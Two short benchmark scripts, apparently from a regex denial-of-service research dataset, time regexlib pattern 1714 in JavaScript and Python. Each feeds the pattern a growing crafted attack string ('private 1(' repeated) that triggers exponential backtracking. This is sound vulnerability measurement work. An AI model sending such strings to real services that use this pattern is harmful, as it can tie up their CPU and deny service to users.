File: regexlib/javascript_test_file/regexlib_1714.js
/* 1714
 * (private|public|protected)\s\w(.)*\((.)*\)[^;]
 * EXPONENT
 * nums:3
 * EXPONENT AttackString:""+"private 1("*512+"! _1SLQ_2;"
 */
var REGEX = /(private|public|protected)\s\w(.)*\((.)*\)[^;]/
for(var i = 1; i <= 5000000; i++) {
    var time = Date.now();
    var attack_str = '' + 'private 1('.repeat(i*1) + '! _1SLQ_2;'
    REGEX.exec(attack_str)
    // REGEX.test(attack_str);
    // attack_str.search(REGEX)
    // attack_str.match(REGEX)
    var time_cost = Date.now() - time;
    console.log(i * 1 + ": " + time_cost+" ms")
}

File: regexlib/2021-5-15/python_re_test_file/regexlib_1714.py
# 1714
# (private|public|protected)\s\w(.)*\((.)*\)[^;]
# EXPONENT
# nums:4
# EXPONENT AttackString:""+"private 1("*512+"! _1SLQ_2;"

import re
from time import perf_counter

regex = """(private|public|protected)\s\w(.)*\((.)*\)[^;]"""
REGEX = re.compile(regex)
for i in range(0, 150000):
    ATTACK = "" + "private 1(" * i * 1 + "! _1SLQ_2;"
    LEN = len(ATTACK)
    BEGIN = perf_counter()
    m = REGEX.search(ATTACK)
    # m = REGEX.match(ATTACK)
    DURATION = perf_counter() - BEGIN
    print(f"{i *1}: took {DURATION} seconds!")